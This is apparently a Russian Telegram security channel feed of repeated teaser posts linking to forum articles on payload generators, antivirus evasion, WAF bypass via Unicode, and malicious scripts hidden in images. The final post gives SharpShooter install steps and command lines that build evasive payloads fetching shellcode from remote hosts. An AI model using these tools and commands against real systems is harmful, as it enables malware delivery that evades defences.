#payload
Trolo - генератор полезной нагрузки
Речь пойдет о trolo, скрипте для создания полезной нагрузки. Форматов нагрузки в нем не так много но все же думаю может кому и пригодится сие чудо.
Trolo - генератор полезной нагрузки
Речь пойдет о trolo, скрипте для создания полезной нагрузки. Форматов нагрузки в нем не так много но все же думаю может кому и пригодится сие чудо.
Telegraph
Trolo - генератор полезной нагрузки
t.me/webware Добрый день всем! Читал очень много статей, решил и сам попробовать написать обзор на один инструмент который нашел на гитхабе. Первый раз пишу поэтому прошу прощения если что то укажу не до конца. Итак речь пойдет о trolo, скрипте для создания…
#payload
Генерация полезных нагрузок (Payload)
Привет, в этой статье я продолжу освещать тему полезных нагрузок (Payloads) и их применение. В первой части мы ознакомились с типами Payloads, в этой разберемся с их созданием. В качестве примера будем использовать MetasploitFramework и Kali Linux в качестве ОС. В Metasploit мы можем, создать полезную нагрузку используя msfconsole.
Генерация полезных нагрузок (Payload)
Привет, в этой статье я продолжу освещать тему полезных нагрузок (Payloads) и их применение. В первой части мы ознакомились с типами Payloads, в этой разберемся с их созданием. В качестве примера будем использовать MetasploitFramework и Kali Linux в качестве ОС. В Metasploit мы можем, создать полезную нагрузку используя msfconsole.
Telegraph
Генерация полезных нагрузок (Payload)
t.me/webware Привет, в этой статье я продолжу освещать тему полезных нагрузок (Payloads) и их применение. В первой части мы ознакомились с типами Payloads, в этой разберемся с их созданием. В качестве примера будем использовать MetasploitFramework и Kali Linux в…
#payload
AVMod2 - Undetectable payload creator
Приветствую! В этой теме я хочу показать довольно занятную программу под Windows, для генерации полезных нагрузок, которые по утверждению автора проекта, не определяются антивирусами.
AVMod2 - Undetectable payload creator
Приветствую! В этой теме я хочу показать довольно занятную программу под Windows, для генерации полезных нагрузок, которые по утверждению автора проекта, не определяются антивирусами.
Telegraph
AVMod2 - Undetectable payload creator
t.me/webware Приветствую! В этой теме я хочу показать довольно занятную программу под Windows, для генерации полезных нагрузок, которые по утверждению автора проекта, не определяются антивирусами. Причем не просто антивирусами, а современными, даже Windows…
Phantom-evasion FUD payloads
https://codeby.net/threads/phantom-evasion-fud-payloads.61284/
#payload #meterpreter
https://codeby.net/threads/phantom-evasion-fud-payloads.61284/
#payload #meterpreter
Форум информационной безопасности - Codeby.net
Статья - Phantom-evasion FUD payloads
И снова Hello! Сегодня я хочу представить Вам удобный инструмент под названием Phantom-evasion.
Что он из себя представляет ? Phantom-evasion - это удобный и простой в использовании инструмент для...
Что он из себя представляет ? Phantom-evasion - это удобный и простой в использовании инструмент для...
MSF Auxiliary Updates
https://codeby.net/threads/msf-auxiliary-updates.58383/
#kali #metasploit #payload
https://codeby.net/threads/msf-auxiliary-updates.58383/
#kali #metasploit #payload
Форум информационной безопасности - Codeby.net
Статья - MSF Auxiliary Updates
Привет! В этой теме я хотел бы обратить внимание на обновление Metasploit Framework, а точнее на новые скрипты (модули), которые мы добавим в него. И отдельно описать модуль...
Pixload: вредоносный скрипт в изображении
Добрый день, уважаемые форумчане и друзья.
Когда-то стали известны способы размещения вредоносного кода в изображении.
Немногим позднее появилась атака Polyglot,когда вредоносный файл одновременно является изображением и JavaScript-кодом..
Продолжение: https://codeby.net/threads/pixload-vredonosnyj-skript-v-izobrazhenii.69411/
#payload #javascript
————————————————
Фриланс Кодебай — сервис поиска удаленной работы и размещения заказов
Добрый день, уважаемые форумчане и друзья.
Когда-то стали известны способы размещения вредоносного кода в изображении.
Немногим позднее появилась атака Polyglot,когда вредоносный файл одновременно является изображением и JavaScript-кодом..
Продолжение: https://codeby.net/threads/pixload-vredonosnyj-skript-v-izobrazhenii.69411/
#payload #javascript
————————————————
Фриланс Кодебай — сервис поиска удаленной работы и размещения заказов
NPS Payload - Скрипт для генерации полезных нагрузок
Приветствую, форумчане! В этой статье хочу представить инструмент для генерации полезных нагрузок. Представляет он из себя скрипт под названием NPS Payload.
Читать: https://codeby.net/forum/threads/nps-payload-skript-dlja-generacii-poleznyx-nagruzok.60073/
#payload
————————————————
Фриланс Кодебай — сервис поиска удаленной работы и размещения заказов
Приветствую, форумчане! В этой статье хочу представить инструмент для генерации полезных нагрузок. Представляет он из себя скрипт под названием NPS Payload.
Читать: https://codeby.net/forum/threads/nps-payload-skript-dlja-generacii-poleznyx-nagruzok.60073/
#payload
————————————————
Фриланс Кодебай — сервис поиска удаленной работы и размещения заказов
Обход антивируса с помощью зашифрованных Payload, используя VENOM
В настоящее время многие вредоносные программы и Payload используют методы шифрования и методы пакетирования с применением Packers, чтобы обойти антивирусное программное обеспечение, поскольку антивирусу трудно обнаружить зашифрованные и упакованные вредоносные программы и Payload.
Читать: https://codeby.net/threads/obxod-antivirusa-s-pomoschju-zashifrovannyx-payload-ispolzuja-venom.64505/
#antivirus #payload #venom
В настоящее время многие вредоносные программы и Payload используют методы шифрования и методы пакетирования с применением Packers, чтобы обойти антивирусное программное обеспечение, поскольку антивирусу трудно обнаружить зашифрованные и упакованные вредоносные программы и Payload.
Читать: https://codeby.net/threads/obxod-antivirusa-s-pomoschju-zashifrovannyx-payload-ispolzuja-venom.64505/
#antivirus #payload #venom
Terminator - генератор Payloads для Metasploit
Добрый день,Уважаемые Форумчане,Друзья и те,кто следит за пульсом ИБ. Хочу порадовать форум сегодня новинкой,которая генерирует различные backdoor. Автора этого замечательного генератора зовут Mohamed Nour. Помогать мне сегодня будут сделать обзор дистрибутивы ArchStrike и BlackArch. Простите за дерзость,но продемонстрирую вам атаку на BlackArch Linux.
Читать: https://codeby.net/threads/terminator-generator-payloads-dlja-metasploit.63477/
#payload #metasploit #framework
Добрый день,Уважаемые Форумчане,Друзья и те,кто следит за пульсом ИБ. Хочу порадовать форум сегодня новинкой,которая генерирует различные backdoor. Автора этого замечательного генератора зовут Mohamed Nour. Помогать мне сегодня будут сделать обзор дистрибутивы ArchStrike и BlackArch. Простите за дерзость,но продемонстрирую вам атаку на BlackArch Linux.
Читать: https://codeby.net/threads/terminator-generator-payloads-dlja-metasploit.63477/
#payload #metasploit #framework
Используем особенности Юникода для обхода WAF
Unicode Compatibility - это форма эквивалентности Юникода, которая гарантирует, что между символами или последовательностями символов, которые могут иметь различный внешний вид или поведение, представлен один и тот же абстрактный символ. Например, римским цифрам соответствуют собственные символы Юникода, но они также могут быть представлены символами латинского алфавита I, V, M и так далее. При использовании совместимости, специальные символы римских цифр будут преобразованы в их эквиваленты с использованием символов латинского алфавита. Такое поведение может открыть дверь для злоупотребления некоторыми слабыми реализациями, которые выполняют совместимость с юникодом после очистки входных данных.
Читать: https://codeby.net/threads/ispolzuem-osobennosti-junikoda-dlja-obxoda-waf.72233/
#unicode #waf #payload
Unicode Compatibility - это форма эквивалентности Юникода, которая гарантирует, что между символами или последовательностями символов, которые могут иметь различный внешний вид или поведение, представлен один и тот же абстрактный символ. Например, римским цифрам соответствуют собственные символы Юникода, но они также могут быть представлены символами латинского алфавита I, V, M и так далее. При использовании совместимости, специальные символы римских цифр будут преобразованы в их эквиваленты с использованием символов латинского алфавита. Такое поведение может открыть дверь для злоупотребления некоторыми слабыми реализациями, которые выполняют совместимость с юникодом после очистки входных данных.
Читать: https://codeby.net/threads/ispolzuem-osobennosti-junikoda-dlja-obxoda-waf.72233/
#unicode #waf #payload
Фреймворк для создания полезных нагрузок, предназначенный для загрузки и выполнения произвольного исходного кода на C#. Инструмент может создавать полезные нагрузки в различных форматах, включая HTA, JS, VBS и WSF. Используется DotNetToJavaScript для вызова методов из сериализованного .NET-объекта SharpShooter.
Полезные нагрузки можно получать через веб или DNS, либо через оба канала одновременно. Также возможна генерация stageless полезных нагрузок со встроенным выполнением шелл-кода.
Созданные полезные нагрузки шифруются алгоритмом RC4 со случайным ключом для базового обхода антивирусов. Фреймворк также включает возможности обнаружения песочниц и привязки к окружению для повышения скрытности.
Поддерживает возможность упаковывать полезную нагрузку в HTML-файл с использованием техники Demiguise HTML smuggling.
git clone https://github.com/mdsecactivebreach/SharpShooter.git
cd SharpShooter
pip3 install -r requirements.txt
SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3
SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4
SharpShooter.py --stageless --dotnetver 2 --payload vbs --output foo --rawscfile ./x86payload.bin --smuggle --template mcafee --com outlook --awlurl http://192.168.2.8:8080/foo.xsl
SharpShooter.py --stageless --dotnetver 2 --payload macro --output foo --rawscfile ./x86payload.bin --com xslremote --awlurl http://192.168.2.8:8080/foo.xsl
#tools #payload #SharpShooter
Please open Telegram to view this post
VIEW IN TELEGRAM
❤10👍5🔥3